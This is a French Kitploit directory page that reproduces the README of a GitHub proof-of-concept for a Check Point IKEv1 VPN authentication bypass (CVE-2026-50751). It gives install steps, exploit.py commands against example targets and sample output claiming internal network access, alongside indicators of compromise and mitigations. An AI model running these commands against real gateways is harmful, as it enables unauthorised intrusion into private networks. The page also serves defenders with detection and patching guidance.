Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit — Vulnérabilité : Faiblesse de flux logique dans l'accès à distance et l'accès mobile | Kitploit
Outils/GitHubGitHub/fevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit
Authentification et AutorisationScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'Intrusion
GitHubfevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit

CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

Vulnérabilité : Faiblesse de flux logique dans l'accès à distance et l'accès mobile

Voir le dépôt
137il y a 3 moisPas encore vérifié
Partager

CVE-2026-50751 - Exploit de contournement d'authentification IKEv1 de Check Point

Security Rating CVSS CISA KEV License Python

⚠️ AVERTISSEMENT IMPORTANT

Ce code est UNIQUEMENT à des fins éducatives et de tests de sécurité autorisés. L'utilisation non autorisée contre des systèmes sans permission explicite est ILLÉGALE. L'auteur n'est pas responsable de l'usage abusif de cet outil.

📋 Description

CVE-2026-50751 est une vulnérabilité critique de contournement d'authentification dans le protocole IKEv1 (obsolète) de Check Point, affectant Remote Access VPN et Mobile Access. Un attaquant non authentifié peut exploiter une faille dans la validation des certificats pour établir une connexion VPN sans mot de passe valide.

Détails techniques

  • Type : Contournement d'authentification (CWE-287)
  • Score CVSS : 9.3 (Critique)
  • Vecteur : AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
  • Exploitation active : Oui (depuis le 2026-05-07)
  • CISA KEV : Ajouté le 2026-06-08, échéance le 2026-06-11

🎯 Versions affectées

ProduitVersions
Security GatewaysR80.40 - R82.10 avec IKEv1 activé
Spark FirewallsR80.20.X, R81.10.X, R82.00.X
Mobile AccessToutes les versions avec IKEv1

Conditions requises

  • ✅ VPN Remote Access ou Mobile Access activé
  • ✅ IKEv1 activé pour l'accès à distance
  • ✅ La passerelle accepte les clients Remote Access hérités
  • ✅ Aucun certificat machine requis

🔧 Installation

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC

# Installer les dépendances
pip install -r requirements.txt

# Donner les permissions d'exécution
chmod +x exploit.py

📦 Dépendances

root@kitploit:~
cryptography>=41.0.0
scapy>=2.5.0

🚀 Utilisation

Analyse de détection

root@kitploit:~
# Détecter si IKEv1 est activé
python3 detector.py -t 192.168.1.1 -p 500

# Analyse rapide
python3 detector.py -t vpn.target.com -p 4500

Exploitation (UTILISATION AUTORISÉE UNIQUEMENT)

root@kitploit:~
# Exécuter le contournement d'authentification
python3 exploit.py -t 192.168.1.1 -p 500

# Avec une interface spécifique
python3 exploit.py -t vpn.target.com --interface eth0

# Mode verbeux
python3 exploit.py -t 192.168.1.1 -p 500 -v

Sortie attendue

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║  CVE-2026-50751 - Check Point IKEv1 Authentication Bypass   ║
║  Critical VPN Authentication Bypass Exploit                 ║
║  CVSS: 9.3 | CISA KEV: 2026-06-08                          ║
╚═══════════════════════════════════════════════════════════════╝

[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available

[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately

🔍 Détection de compromission

Rechercher dans les logs SmartConsole

root@kitploit:~
# Requête pour détecter les attaquants
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)

IOCs connus

TypeValeur
IPs attaquantes45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173
Hashs52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce

🛡️ Atténuation

Option 1 - Appliquer le correctif (RECOMMANDÉ)

VersionHotfix TakeLien

Option 2 - Atténuations temporaires

Désactiver les clients hérités :

SmartConsole → Gateway → VPN Clients → Authentication

Décocher "Allow older clients"

Forcer uniquement IKEv2 :

Global Properties → Remote Access → VPN Authentication

Sélectionner "IKEv2 only"

Rendre obligatoire le certificat machine :

VPN Clients → Authentication → Machine Certificate Authentication

Définir sur "Mandatory"

📚 Références

  • NVD - CVE-2026-50751
  • Check Point SK185033
  • CISA Known Exploited Vulnerabilities
  • Blog Post - Check Point Research

📊 Chronologie

DateÉvénement
2026-05-07Première exploitation observée
2026-06-04Check Point lance l'enquête
2026-06-08CVE publié, CISA ajoute au KEV
2026-06-11Date limite CISA pour corriger

⚖️ Avertissement

Ce logiciel est fourni "en l'état", sans garantie d'aucune sorte. L'auteur n'est pas responsable de l'usage abusif de cet outil. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

📞 Contact

Pour signaler des bogues ou contribuer :

  • Ouvrir un issue sur GitHub
  • Contact : [email protected]

🌟 Crédits

  • Check Point Research - Pour la découverte et l'analyse
  • CISA - Pour la coordination et la diffusion
  • Communauté de sécurité - Pour la réponse rapide

⭐ Si ce PoC vous a été utile, pensez à laisser une étoile au dépôt


📄 LICENCE (GPLv3)

📦 requirements.txt

root@kitploit:~
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6

⚠️ Note importante pour GitHub :

Télécharger l’outil
R82.10Take 19Télécharger
R82Take 103Télécharger
R81.20Take 141Télécharger